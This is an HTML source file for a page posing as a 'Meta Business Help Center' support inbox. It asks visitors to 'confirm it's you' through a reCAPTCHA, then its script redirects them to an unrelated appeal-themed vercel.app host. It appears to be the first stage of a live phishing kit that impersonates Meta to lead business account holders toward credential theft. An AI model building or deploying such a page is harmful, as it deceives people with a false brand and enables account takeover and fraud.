<!doctype html>
<html lang="en">

<head>
  <title>Support Center</title>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
    integrity="sha384-xOolHFLEh07PJGoPkLv1IbcEPTNtaed2xpHsD9ESMhqIYd0nLMwNLD69Npy4HI+N" crossorigin="anonymous">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link
    href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
    rel="stylesheet">

  <script src="https://www.google.com/recaptcha/api.js" async defer></script>
  <script>
    function onCaptchaComplete() {
      // Delay the redirection for 1 second (adjust as needed)
      setTimeout(function () {
        // Redirect to example.com
        window.location.href = 'https://review-submit-appeal-02.vercel.app/';
      }, 1000); // Delay in milliseconds
    }
  </script>

  <style type="text/css">
    body {
      background-color: #f0f2f5;
      font-family: Roboto;
    }

    .headeri {
      /*box-shadow: 0 4px 5px 0 rgb(0 0 0 / 2%), 0 2px 3px 0 rgb(0 0 0 / 2%), inset 0 0 0 1px rgb(255 255 255 / 50%);*/
      background-color: white;
    }

    .trupi {
      margin-top: 60px;
      margin-bottom: 50px;
    }

    .trupimrena {
      background-color: white;
      padding: 20px;
      border: 1px solid #e2e4e7;
      border-radius: 10px;
      box-shadow: 0 4px 5px 0 rgb(0 0 0 / 2%), 0 2px 3px 0 rgb(0 0 0 / 2%), inset 0 0 0 1px rgb(255 255 255 / 50%);
    }

    .header-bg {
      background-color: rgb(53, 87, 175);
      padding: 25px 30px;
      box-sizing: border-box;
      display: block;
      font-size: 1rem;
      font-weight: 400;
      line-height: 1.5;
      color: #212529;
    }

    .header-text {
      align-items: center;
      display: flex;
      justify-content: space-between;
    }

    .header_leftSide {
      align-items: center;
      display: flex;
      gap: 20px;
    }

    .company_logo {
      margin: 0;
      padding: 0;
      scroll-behavior: smooth;
    }

    .header_content {
      border-left: 1px solid #fff;
      padding-left: 14px;
    }

    .header_text {
      color: #fff;
      font-size: 14px;
      margin: 0;
      font-weight: 400;
      line-height: 1.2;
    }

    .support_header {
      align-items: center;
      display: flex;
      flex-direction: column;
      justify-content: center;
      background-color: #236e76;
      height: 210px;
      width: 100%;
    }

    .support_wrapper {
      align-items: center;
      display: flex;
      flex-direction: column;
      justify-content: center;
    }

    .support_wrapper>p {
      color: #fff;
      font-size: 12px;
      letter-spacing: 3px;
      line-height: 21px;
      margin-bottom: 0;
      text-align: center;
      margin-top: 0;
    }

    .support_wrapper>h1 {
      color: #fff;
      font-size: 40px;
      font-weight: 300;
      text-align: center;
      margin-top: 0;
      margin-bottom: 0.5rem;
      line-height: 1.2;
    }

    .captcha-box {
      display: flex;
      align-items: center;
      justify-content: center;
    }
  </style>
</head>

<body>
  <div class="headeri header-bg">
    <div class="container-fluid header-text" style="margin-left: auto; margin-right: auto; width: 100%;">
      <div class="header_leftSide">
        <div class="company_logo">
          <img src="logo.png" class="img-fluid" height="12px" width="54px">
        </div>
        <div class="header_content">
          <h1 class="header_text">Support Inbox</h1>
        </div>
      </div>
    </div>
  </div>
  <div class="support_header">
    <div class="support_container">
      <div class="support_wrapper">
        <p>Meta Business Help Center</p>
        <h1>Get Support</h1>
      </div>
    </div>
  </div>
  <div class="trupi">
    <div class="container">
      <div class="row">
        <div class="col-md-6 offset-md-3">
          <div class="trupimrena">
            <!-- <div class='mtcaptcha'></div> -->
            <form id="yourFormId" action="" method="POST">
              <h2 style="font-weight: 600; font-size: 24px; margin-bottom: 20px;">Help us confirm it's you</h2>
              <div class="g-recaptcha captcha-box" data-sitekey="6Lf6dxcqAAAAAAIWnQtquIVkSaC75KSQ_97AuunY"
                data-callback="onCaptchaComplete"></div>

              <p style="color:#65676b; font-size:12px;">This helps us to combat harmful conduct, detect and prevent spam
                and maintain the integrity of our Products. <br><br>
                We've used reCAPTCHA Enterprise product to provide this security check. Your use of reCAPTCHA Enterprise
                is subject to Google's Privacy Policy and Terms of Use.<br><br>
                reCAPTCHA Enterprise collects hardware and software information such as device and application data, and
                sends it to Google to provide, maintain, and improve reCAPTCHA Enterprise and for general security
                purposes. This information is not used by Google for personalized advertising.</p>
              <input type="button" value="Continue" id="continuebutton" class="btn btn-primary"
                style="background-color:#1b74e4" />
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
  <script src="https://code.jquery.com/jquery-3.6.3.min.js"
    integrity="sha256-pvPw+upLPUjgMXY0G+8O0xUf+/Im1MZjXxxgOcBQBXU=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-Fy6S3B9q64WdZWQUiU+q4/2Lc9npb8tCaSX9FK7E8HnRr0Jz8D6OP9dO5Vg3Q9ct" crossorigin="anonymous">
  </script>
</body>

</html>